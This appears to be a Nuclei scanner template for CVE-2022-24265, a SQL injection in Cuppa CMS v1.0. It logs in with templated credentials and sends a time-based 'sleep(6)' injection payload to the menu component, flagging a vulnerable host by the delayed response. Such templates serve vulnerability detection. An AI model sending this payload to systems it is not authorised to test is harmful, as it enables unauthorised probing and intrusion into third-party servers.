47 lines
1.4 KiB
YAML
47 lines
1.4 KiB
YAML
|
id: CVE-2022-24265
|
||
|
|
||
|
info:
|
||
|
name: Cuppa CMS v1.0 - SQL injection
|
||
|
author: theamanrawat
|
||
|
severity: high
|
||
|
description: |
|
||
|
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
|
||
|
reference:
|
||
|
- https://github.com/CuppaCMS/CuppaCMS
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-24265
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||
|
cvss-score: 7.5
|
||
|
cve-id: CVE-2022-24265
|
||
|
cwe-id: CWE-89
|
||
|
metadata:
|
||
|
verified: "true"
|
||
|
tags: cve,cve2022,sqli,cuppa,authenticated
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST / HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
user={{username}}&password={{password}}&language=en&task=login
|
||
|
|
||
|
- |
|
||
|
@timeout: 20s
|
||
|
POST /components/menu/ HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||
|
|
||
|
path=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185
|
||
|
|
||
|
cookie-reuse: true
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'duration>=6'
|
||
|
- 'status_code_2 == 200'
|
||
|
- 'contains(content_type_2, "text/html")'
|
||
|
- 'contains(body_2, "menu/html/edit.php")'
|
||
|
condition: and
|